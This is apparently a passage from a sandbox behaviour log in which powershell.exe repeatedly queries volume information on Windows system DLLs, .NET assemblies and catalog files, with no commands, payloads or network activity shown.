Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
